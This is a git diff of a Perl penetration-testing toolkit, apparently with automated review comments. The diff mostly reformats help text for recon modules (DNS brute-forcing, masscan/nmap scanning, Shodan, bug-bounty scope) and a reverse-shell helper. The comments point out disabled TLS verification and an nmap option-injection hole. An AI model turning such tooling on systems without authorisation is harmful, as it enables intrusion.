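Review bot: Removing the `else {` line in the Read_File hunk at -15,36 while keeping its `push @result, $line;` makes that push unconditional: with `--entrypoint` set, every line is now returned whether or not the module call succeeded, and lines that did succeed are returned twice. The `}` that used to close the `else` is still present as context, so the nesting also looks one brace out and is worth checking with `perl -c`. Restoring the branch as `else { push @result, $line; }` brings back the filter. Since the whole file is now read into `@lines` first, the `while (my $line = <$fh>)` form would also avoid holding a large list in memory.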
@@ -28,15 +28,18 @@ package Spellbook::Helper::Reverse_Shell { } if ($help) { - return " - \rHelper::Reverse_Shell - \r===================== - \r-h, --help See this menu - \r-t, --target Set your IP/Host to send the reverse shell - \r-p, --port Define a port to connect - \r-l, --lang Default is perl, types avaible: perl, bash\n\n"; + return<<"EOT"; + +Helper::Reverse_Shell +===================== +-h, --help See this menu +-t, --target Set your IP/Host to send the reverse shell +-p, --port Define a port to connect +-l, --lang Default is perl, types avaible: perl, bash\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm index 79de620..4320c8d 100644 --- a/lib/Spellbook/Helper/Scope.pm +++ b/lib/Spellbook/Helper/Scope.pm @@ -42,16 +42,16 @@ package Spellbook::Helper::Scope { push @results, $info; } } - + if ($save) { if ($keep && exists $yamlfile->[0]->{$save}) { push @{$yamlfile->[0]->{$save}}, @results; } - + else { $yamlfile->[0]->{$save} = [@results]; } - + $yamlfile->write($scope); } @@ -59,17 +59,20 @@ package Spellbook::Helper::Scope { } if ($help) { - return " - \rHelper::Scope - \r===================== - \r-h, --help See this menu - \r-S, --scope Define a YML file as a scope - \r-i, --information Set an information to extract from your scope - \r-e, --entrypoint Send informations to another entrypoint module - \r-K, --keep Keep the current values in the file and add news values - \r--save Save the output on some attribute\n\n"; + return<<"EOT"; + +Helper::Scope +===================== +-h, --help See this menu +-S, --scope Define a YML file as a scope +-i, --information Set an information to extract from your scope +-e, --entrypoint Send informations to another entrypoint module +-K, --keep Keep the current values in the file and add news values +--save Save the output on some attribute\n\n"; + +EOT } - + return 0; } } 
diff --git a/lib/Spellbook/Helper/Uniq.pm b/lib/Spellbook/Helper/Uniq.pm index d4f81a2..7541696 100644 --- a/lib/Spellbook/Helper/Uniq.pm +++ b/lib/Spellbook/Helper/Uniq.pm @@ -17,11 +17,14 @@ package Spellbook::Helper::Uniq { } if ($help) { - return " - \rHelper::Uniq - \r===================== - \r-h, --help See this menu - \r-v, --target Define a value\n\n"; + return<<"EOT"; + +Helper::Uniq +===================== +-h, --help See this menu +-v, --target Define a value\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Nmap.pm b/lib/Spellbook/Parser/Nmap.pm index 6127b7b..2f464f0 100644 --- a/lib/Spellbook/Parser/Nmap.pm +++ b/lib/Spellbook/Parser/Nmap.pm @@ -2,7 +2,7 @@ package Spellbook::Parser::Nmap { use strict; use warnings; use XML::Simple; - + # https://metacpan.org/pod/Nmap::Parser sub new { @@ -18,14 +18,14 @@ package Spellbook::Parser::Nmap { if ($file) { my $xml = XML::Simple -> new(); my $data = $xml -> XMLin($file); - + my $host = $data -> {host} -> {address} -> {addr}; - + # foreach my $content (@{$data -> {host} -> {ports} -> {port}}) { # print Dumper($content); # push @result, $element -> {Key}; # } - + # my $state = $content -> {state} -> {state}; # if (($state eq "open") || ($state eq "filtered")) { @@ -36,16 +36,19 @@ package Spellbook::Parser::Nmap { # push @results, "$host -> [$protocol] | [$state]-> $port \t | $service\n"; # } # }; - + return @results; } if ($help) { - return " - \rParser::Nmap - \r===================== - \r-h, --help See this menu - \r-f, --file Set an XML file from Nmap output\n\n"; + return<<"EOT"; + +Parser::Nmap +===================== +-h, --help See this menu +-f, --file Set an XML file from Nmap output\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Nozaki.pm b/lib/Spellbook/Parser/Nozaki.pm index 36f9551..fed200a 100644 --- a/lib/Spellbook/Parser/Nozaki.pm +++ b/lib/Spellbook/Parser/Nozaki.pm 
@@ -25,11 +25,14 @@ package Spellbook::Parser::Nozaki { } if ($help) { - return " - \rParser::Nozaki - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Nozaki +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/S3_Bucket.pm b/lib/Spellbook/Parser/S3_Bucket.pm index acdd4aa..16288ba 100644 --- a/lib/Spellbook/Parser/S3_Bucket.pm +++ b/lib/Spellbook/Parser/S3_Bucket.pm @@ -16,10 +16,10 @@ package Spellbook::Parser::S3_Bucket { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; + if ($target !~ /^http(?:s)?:\/\//x) { + $target = "https://$target"; } - + if ($target !~ /\/$/x) { $target .= "/"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -35,16 +35,19 @@ package Spellbook::Parser::S3_Bucket { } } } - + return @result; } if ($help) { - return " - \rParser::Bucket - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Bucket +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Sitemap.pm b/lib/Spellbook/Parser/Sitemap.pm index 8ffb154..48c2ad7 100644 --- a/lib/Spellbook/Parser/Sitemap.pm +++ b/lib/Spellbook/Parser/Sitemap.pm @@ -15,7 +15,7 @@ package Spellbook::Parser::Sitemap { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } if ($target !~ /\/sitemap.xml$/x) { $target = "$target/sitemap.xml"; } my $userAgent = Spellbook::Core::UserAgent -> new(); 
@@ -33,16 +33,19 @@ package Spellbook::Parser::Sitemap { } } } - + return @result; } if ($help) { - return " - \rParser::Sitemap - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Sitemap +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Platform/HackerOne.pm b/lib/Spellbook/Platform/HackerOne.pm index 003a6a6..739fa84 100644 --- a/lib/Spellbook/Platform/HackerOne.pm +++ b/lib/Spellbook/Platform/HackerOne.pm @@ -18,7 +18,7 @@ package Spellbook::Platform::HackerOne { ); my $token = Spellbook::Core::Credentials -> new(["--platform" => "hackerone"]); - + if ($token && $target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $api_url = "https://api.hackerone.com/v1/hackers/programs/$target"; @@ -35,7 +35,7 @@ package Spellbook::Platform::HackerOne { for my $scope (@{$data -> {"relationships"} -> {"structured_scopes"} -> {"data"}}) { if (($scope -> {"attributes"} -> {"asset_type"} eq "URL") && ($scope -> {"attributes"} -> {"eligible_for_bounty"})) { my $url = $scope -> {"attributes"} -> {"asset_identifier"}; - + push @result, Spellbook::Helper::Host_Normalization -> new(["--target" => $url]); } } @@ -45,15 +45,18 @@ package Spellbook::Platform::HackerOne { } if ($help) { - return " - \rPlatform::HackerOne - \r===================== - \r-h, --help See this menu - \r-t, --target Program handle from HackerOne\n\n"; + return<<"EOT"; + +Platform::HackerOne +===================== +-h, --help See this menu +-t, --target Program handle from HackerOne\n\n"; + +EOT } return 0; } -} +} 1; \ No newline at end of file diff --git a/lib/Spellbook/Platform/Intigriti.pm b/lib/Spellbook/Platform/Intigriti.pm index 4db7ac1..8c049c3 100644 --- a/lib/Spellbook/Platform/Intigriti.pm +++ b/lib/Spellbook/Platform/Intigriti.pm 
@@ -5,10 +5,13 @@ package Spellbook::Platform::Intigriti { sub new { my ($self, $parameters) = @_; - return " - \rPlatform::Intigriti - \r=================== - \rThis module is under development\n\n"; + return<<"EOT"; + +Platform::Intigriti +=================== +This module is under development\n\n"; + +EOT } } diff --git a/lib/Spellbook/Recon/DNS_Bruteforce.pm b/lib/Spellbook/Recon/DNS_Bruteforce.pm index 22c74f0..34d3a1c 100644 --- a/lib/Spellbook/Recon/DNS_Bruteforce.pm +++ b/lib/Spellbook/Recon/DNS_Bruteforce.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::DNS_Bruteforce { if (@file) { foreach my $line (@file) { my $return = Spellbook::Recon::Host_Resolv -> new (["--target" => "$line.$target"]); - + if ($return) { push @result, "$line.$target"; } @@ -31,14 +31,17 @@ package Spellbook::Recon::DNS_Bruteforce { return @result; } - + if ($help) { - return " - \rRecon::DNS_Bruteforce - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain as a target - \r-f, --file Define a wordlist\n\n"; + return<<"EOT"; + +Recon::DNS_Bruteforce +===================== +-h, --help See this menu +-t, --target Set a domain as a target +-f, --file Define a wordlist\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Detect_Error.pm b/lib/Spellbook/Recon/Detect_Error.pm index 56ce245..987405d 100644 --- a/lib/Spellbook/Recon/Detect_Error.pm +++ b/lib/Spellbook/Recon/Detect_Error.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Detect_Error { if ($target) { $target =~ s/^http(s)?:\/\///x; - + my $resolv = Net::DNS::Resolver -> new(); my $reply = $resolv -> search($target); @@ -30,7 +30,7 @@ package Spellbook::Recon::Detect_Error { if ($request -> code() == 404) { push @results, $target; - } + } } } } 
@@ -39,11 +39,14 @@ package Spellbook::Recon::Detect_Error { } if ($help) { - return " - \rChecker - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Checker +============== +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } } } diff --git a/lib/Spellbook/Recon/Dorking.pm b/lib/Spellbook/Recon/Dorking.pm index a3bbd8a..1302d64 100644 --- a/lib/Spellbook/Recon/Dorking.pm +++ b/lib/Spellbook/Recon/Dorking.pm @@ -20,11 +20,13 @@ package Spellbook::Recon::Dorking { } if ($help) { - return " - \rRecon::Dorking - \r===================== - \r-h, --help See this menu - \r \n\n"; + return<<"EOT"; + +Recon::Dorking +===================== +-h, --help See this menu\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Extract_Links.pm b/lib/Spellbook/Recon/Extract_Links.pm index 3fb8bde..46b6c1a 100755 --- a/lib/Spellbook/Recon/Extract_Links.pm +++ b/lib/Spellbook/Recon/Extract_Links.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::Extract_Links { ssl_opts => { verify_hostname => 0 } ); - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -30,12 +30,12 @@ package Spellbook::Recon::Extract_Links { my $request = $mech -> get($target); my @links = $mech -> links(); - + for my $link (@links) { my $url = $link -> url(); - if (($url) && ($url !~ m/#/x) && ($url !~ /^http(s)?:\/\//x)) { - if ($url !~ /^\//x) { + if (($url) && ($url !~ m/#/x) && ($url !~ /^http(?:s)?:\/\//x)) { + if ($url !~ /^\//x) { $url = "/" . $url; } 
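Review bot: The client in the Extract_Links hunk at -22,7 is still built with `ssl_opts => { verify_hostname => 0 }`, so the `https://` prefix added just below gives no assurance about who answered: any on-path host can supply the page the links are extracted from. Leaving verification at its default, or exposing an explicit opt-out flag for lab targets with self-signed certificates, would be safer, e.g. `ssl_opts => { verify_hostname => 1 }`. The constructor call starts above the hunk, so its other options are not visible here.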
@@ -57,12 +57,15 @@ package Spellbook::Recon::Extract_Links { } if ($help) { - return " - \rRecon::Extrac_Links - \r===================== - \r-h, --help See this menu - \r-t, --target Define a web page to extract all links - \r-d, --deep Draft recursive function\n\n"; + return<<"EOT"; + +Recon::Extrac_Links +===================== +-h, --help See this menu +-t, --target Define a web page to extract all links +-d, --deep Draft recursive function\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Find_Emails.pm b/lib/Spellbook/Recon/Find_Emails.pm index f1d9a38..21674e0 100644 --- a/lib/Spellbook/Recon/Find_Emails.pm +++ b/lib/Spellbook/Recon/Find_Emails.pm @@ -30,15 +30,18 @@ package Spellbook::Recon::Find_Emails { } return @result; - } + } } if ($help) { - return " - \rRecon::Find_Emails - \r===================== - \r-h, --help See this menu - \r-t, --target Define a domain to find emails\n"; + return<<"EOT"; + +Recon::Find_Emails +===================== +-h, --help See this menu +-t, --target Define a domain to find emails\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Get_IP.pm b/lib/Spellbook/Recon/Get_IP.pm index e6eb2ad..e3f8533 100644 --- a/lib/Spellbook/Recon/Get_IP.pm +++ b/lib/Spellbook/Recon/Get_IP.pm @@ -22,15 +22,18 @@ package Spellbook::Recon::Get_IP { if ($ip) { return inet_ntoa($ip); - } + } } if ($help) { - return " - \rRecon::Get_IP - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Get_IP +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/HTTP_Probe.pm b/lib/Spellbook/Recon/HTTP_Probe.pm index 49e9467..ee5e606 100644 --- a/lib/Spellbook/Recon/HTTP_Probe.pm +++ b/lib/Spellbook/Recon/HTTP_Probe.pm 
@@ -14,14 +14,14 @@ package Spellbook::Recon::HTTP_Probe { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $response = $userAgent -> get($target); - if ($response -> code() != 500) { + if ($response -> code() != 500) { push @result, $target; } @@ -29,11 +29,14 @@ package Spellbook::Recon::HTTP_Probe { } if ($help) { - return " - \rRecon::HTTP_Probe - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target to make a HTTP request probe\n\n"; + return<<"EOT"; + +Recon::HTTP_Probe +===================== +-h, --help See this menu +-t, --target Define a target to make a HTTP request probe\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/HaveBeenPwned.pm b/lib/Spellbook/Recon/HaveBeenPwned.pm index b2c5adf..1621406 100644 --- a/lib/Spellbook/Recon/HaveBeenPwned.pm +++ b/lib/Spellbook/Recon/HaveBeenPwned.pm @@ -6,7 +6,7 @@ package Spellbook::Recon::HaveBeenPwned { use Spellbook::Core::Credentials; # THIS IS A DRAFT MODULE - + sub new { my ($self, $parameters) = @_; my ($help, $target); @@ -33,11 +33,14 @@ package Spellbook::Recon::HaveBeenPwned { } if ($help) { - return " - \rRecon::HaveBeenPwned - \r==================== - \r-h, --help See this menu - \r-e, --target Define an e-mail address as a target\n\n"; + return<<"EOT"; + +Recon::HaveBeenPwned +==================== +-h, --help See this menu +-e, --target Define an e-mail address as a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Host_Resolv.pm b/lib/Spellbook/Recon/Host_Resolv.pm index 7a79ac0..8de4dde 100644 --- a/lib/Spellbook/Recon/Host_Resolv.pm +++ b/lib/Spellbook/Recon/Host_Resolv.pm 
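Review bot: The liveness test `$response -> code() != 500` in `Spellbook::Recon::HTTP_Probe` treats status 500 as no answer, so a server that really replies with HTTP 500 is dropped from `@result`, while every other error status counts as alive. If `Spellbook::Core::UserAgent` is built on LWP::UserAgent (not visible here), the 500 is presumably meant to catch LWP's internally generated failure response. That case carries a `Client-Warning: Internal response` header and can be tested directly, for example `if (($response -> header("Client-Warning") // "") ne "Internal response") {`. The sub begins above the hunk.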
@@ -23,15 +23,18 @@ package Spellbook::Recon::Host_Resolv { if ($search) { return $target; - } + } } - + if ($help) { - return " - \rRecon::Host_Resolv - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Host_Resolv +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Internal_DNS.pm b/lib/Spellbook/Recon/Internal_DNS.pm index 9dabb96..79a3622 100644 --- a/lib/Spellbook/Recon/Internal_DNS.pm +++ b/lib/Spellbook/Recon/Internal_DNS.pm @@ -26,11 +26,14 @@ package Spellbook::Recon::Internal_DNS { } if ($help) { - return " - \rRecon::Internal_DNS - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Internal_DNS +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Masscan.pm b/lib/Spellbook/Recon/Masscan.pm index 205742c..d460388 100644 --- a/lib/Spellbook/Recon/Masscan.pm +++ b/lib/Spellbook/Recon/Masscan.pm @@ -5,11 +5,11 @@ package Spellbook::Recon::Masscan { use List::MoreUtils qw(uniq); use Spellbook::Recon::Get_IP; use Spellbook::Helper::CDN_Checker; - + sub new { my ($self, $parameters) = @_; my ($help, @target, @ports, @result, $skip_cdn); - + my @arguments = qw(--banners); Getopt::Long::GetOptionsFromArray ( @@ -19,7 +19,7 @@ package Spellbook::Recon::Masscan { "p|port=s" => \@ports, "a|arguments" => \@arguments, "skip-cdn" => \$skip_cdn - ); + ); if (@target) { if (!@ports) { @ports = "1-65535"; } @@ -28,7 +28,7 @@ package Spellbook::Recon::Masscan { my $CDN_Checker = Spellbook::Helper::CDN_Checker -> new (["--target" => $target[0]]); if ($CDN_Checker) { - return 0; + return 0; } } 
@@ -45,23 +45,26 @@ package Spellbook::Recon::Masscan { if ($scan) { my $result = $masscan -> scan_results(); - foreach my $value (@{$result -> {"scan_results"}}) { + foreach my $value (@{$result -> {"scan_results"}}) { push @result, $target[0] . ":" . $value -> {"ports"} -> [0] -> {"port"}; } - + return uniq @result; } - } + } if ($help) { - return " - \rRecon::Masscan - \r===================== - \r-h, --help See this menu - \r-t, --target Set an Domain/IP to make a port scanning using masscan - \r-p, --ports Define ports to scan - \r-a, --arguments Parameters to masscanner - \r--skip-cdn Skip the CDN check\n\n"; + return<<"EOT"; + +Recon::Masscan +===================== +-h, --help See this menu +-t, --target Set an Domain/IP to make a port scanning using masscan +-p, --ports Define ports to scan +-a, --arguments Parameters to masscanner +--skip-cdn Skip the CDN check\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Nmap_Scanner.pm b/lib/Spellbook/Recon/Nmap_Scanner.pm index 23ea636..15278ad 100644 --- a/lib/Spellbook/Recon/Nmap_Scanner.pm +++ b/lib/Spellbook/Recon/Nmap_Scanner.pm @@ -2,28 +2,28 @@ package Spellbook::Recon::Nmap_Scanner { use strict; use warnings; use Nmap::Scanner; # https://metacpan.org/pod/Nmap::Scanner - + sub scan_started { my $self = shift; my $host = shift; - + my $hostname = $host -> hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); my $status = $host -> status(); - + print "$hostname ($addresses) is $status\n"; return 0; } - + sub port_found { my $self = shift; my $host = shift; my $port = shift; - + my $name = $host->hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); - + print "On host $name ($addresses), found ", $port->state()," port ", join('/', $port -> protocol(), $port -> portid()), "\n"; 
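Review bot: The Masscan help text added here documents `-p, --ports` and `-a, --arguments Parameters to masscanner`, but the option table in the earlier hunk of this file declares `"p|port=s"` and `"a|arguments"`. Getopt::Long accepts abbreviations of `port` but not the longer `--ports`, and `arguments` without `=s` takes no value, so no masscan parameters can actually be passed through it. Either change the help line to `-p, --port` or the spec to `"p|port|ports=s"`, and declare `"a|arguments=s"`.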
@@ -48,20 +48,23 @@ package Spellbook::Recon::Nmap_Scanner { $scanner -> register_scan_started_event(\&scan_started); $scanner -> register_port_found_event(\&port_found); $scanner -> scan("-sS -p 1-1024 -O $target"); - + my $results = $scanner -> scan(); # print Dumper($results); return @result; - } + } if ($help) { - return " - \rRecon::Nmap_Scanner - \r===================== - \r-h, --help See this menu - \r-t, --target Set an IP to run the scanner\n\n"; + return<<"EOT"; + +Recon::Nmap_Scanner +===================== +-h, --help See this menu +-t, --target Set an IP to run the scanner\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Query_Shodan.pm b/lib/Spellbook/Recon/Query_Shodan.pm index b4453c2..0b109b0 100644 --- a/lib/Spellbook/Recon/Query_Shodan.pm +++ b/lib/Spellbook/Recon/Query_Shodan.pm @@ -24,7 +24,7 @@ package Spellbook::Recon::Query_Shodan { if ($httpCode == 200) { my $content = decode_json($request -> content()); - + foreach my $data (@{$content -> {"matches"}}) { my $hostname = $data -> {"ip_str"}; my $port = $data -> {"port"}; @@ -37,11 +37,14 @@ package Spellbook::Recon::Query_Shodan { } if ($help) { - return " - \rRecon::Shodan - \r===================== - \r-h, --help See this menu - \r-t, --query Define a query\n\n"; + return<<"EOT"; + +Recon::Shodan +===================== +-h, --help See this menu +-t, --query Define a query\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Shodan_Enumeration.pm b/lib/Spellbook/Recon/Shodan_Enumeration.pm index d8edb03..bd02dae 100644 --- a/lib/Spellbook/Recon/Shodan_Enumeration.pm +++ b/lib/Spellbook/Recon/Shodan_Enumeration.pm @@ -21,7 +21,7 @@ package Spellbook::Recon::Shodan_Enumeration { if ($target =~ /^http(s)?:\/\//x) { $target =~ s/^http(s)?:\/\///x; } - + my $validate = is_domain($target); if ($validate) { 
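Review bot: In `Spellbook::Recon::Nmap_Scanner`, `$scanner -> scan("-sS -p 1-1024 -O $target")` puts the `--target` value straight into the nmap option string, so a value containing whitespace or starting with `-` is read as additional nmap options rather than as a host. Validate `$target` as a hostname or IP address before this call and return early otherwise, for example `return 0 unless $target =~ m{\A[A-Za-z0-9.:-]+\z}x && $target !~ m{\A-}x;`. The following line calls `$scanner -> scan()` again to fill `$results`, which looks like a second scan with no arguments, and `@result` is returned without being filled in the visible lines. `my $results = $scanner -> scan("-sS -p 1-1024 -O $target");` would do it in one call. The sub starts above the hunk.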
@@ -61,11 +61,14 @@ package Spellbook::Recon::Shodan_Enumeration { } if ($help) { - return " - \rRecon::Shodan_Enum - \r===================== - \r-h, --help See this menu - \r-t, --target Set an IP to see infos on shodan API\n\n"; + return<<"EOT"; + +Recon::Shodan_Enum +===================== +-h, --help See this menu +-t, --target Set an IP to see infos on shodan API\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Subdomain_Enumeration.pm b/lib/Spellbook/Recon/Subdomain_Enumeration.pm index 1d06c66..2bcd126 100644 --- a/lib/Spellbook/Recon/Subdomain_Enumeration.pm +++ b/lib/Spellbook/Recon/Subdomain_Enumeration.pm @@ -5,7 +5,7 @@ package Spellbook::Recon::Subdomain_Enumeration { use List::MoreUtils qw(uniq); use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -50,14 +50,17 @@ package Spellbook::Recon::Subdomain_Enumeration { } return uniq @result; - } + } if ($help) { - return " - \rRecon::Subdomain_Enumeration - \r===================== - \r-h, --help See this menu - \r-t, --target Find subdomains from a target using SecurityTrails\n\n"; + return<<"EOT"; + +Recon::Subdomain_Enumeration +===================== +-h, --help See this menu +-t, --target Find subdomains from a target using SecurityTrails\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm index 0801727..1f411df 100644 --- a/lib/Spellbook/Recon/Technologies.pm +++ b/lib/Spellbook/Recon/Technologies.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Technologies { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } 
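Review bot: The new scheme test in `Spellbook::Recon::Technologies`, `/^http(?:s)?:\/\//x`, wraps a single character in a group; `s?` says the same thing, and a brace delimiter removes the escaped slashes: `if ($target !~ m{\Ahttps?://}xi) {`. The `i` flag is an addition, since without it an upper-case `HTTP://` target gets a second scheme prefixed. The same pattern appears in the Extract_Links and HTTP_Probe hunks on this page.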
@@ -36,11 +36,14 @@ package Spellbook::Recon::Technologies { } if ($help) { - return " - \rRecon::Detect_Tech - \r===================== - \r-t, --target Define the target - \r-h, --help See this menu\n\n"; + return<<"EOT"; + +Recon::Detect_Tech +===================== +-t, --target Define the target +-h, --help See this menu\n\n"; + +EOT } return 1; diff --git a/lib/Spellbook/Recon/WayBackUrls.pm b/lib/Spellbook/Recon/WayBackUrls.pm index ffce702..d78d397 100644 --- a/lib/Spellbook/Recon/WayBackUrls.pm +++ b/lib/Spellbook/Recon/WayBackUrls.pm @@ -3,7 +3,7 @@ package Spellbook::Recon::WayBackUrls { use warnings; use JSON; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,11 +14,11 @@ package Spellbook::Recon::WayBackUrls { "t|target=s" => \$target ); - if ($target) { + if ($target) { my $endpoint = "http://web.archive.org/cdx/search/cdx?url=$target/*&output=json&collapse=urlkey"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($endpoint); - + if (($request -> code() == 200) && ($request -> content ne "[]")) { my $content = decode_json($request -> content); @@ -33,11 +33,14 @@ package Spellbook::Recon::WayBackUrls { } if ($help) { - return " - \rRecon::WaybackUrls - \r===================== - \r-h, --help See this menu - \r-t, --target Set an website to see paths from WayBackMachine\n"; + return<<"EOT"; + +Recon::WaybackUrls +===================== +-h, --help See this menu +-t, --target Set an website to see paths from WayBackMachine\n"; + +EOT } return 0; diff --git a/spellbook.pl b/spellbook.pl index fcef7a0..b1792da 100755 --- a/spellbook.pl +++ b/spellbook.pl @@ -11,7 +11,7 @@ sub main { my ($search, $module, @result); - + Getopt::Long::GetOptions ( "s|search=s" => \$search, "m|module=s" => \$module @@ -25,6 +25,8 @@ sub main { } return Spellbook::Core::Helper -> new() unless $search || $module; + + return 0; } main(); \ No newline at end of file
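Review bot: The fall-through after the help block in `Spellbook::Recon::Technologies` is `return 1;`, while the other modules touched by this commit end with `return 0;` when no option matched. If the caller prints or tests the return value (not visible here), this module reports a result of `1` for an empty invocation. Changing it to `return 0;` would align it with its siblings.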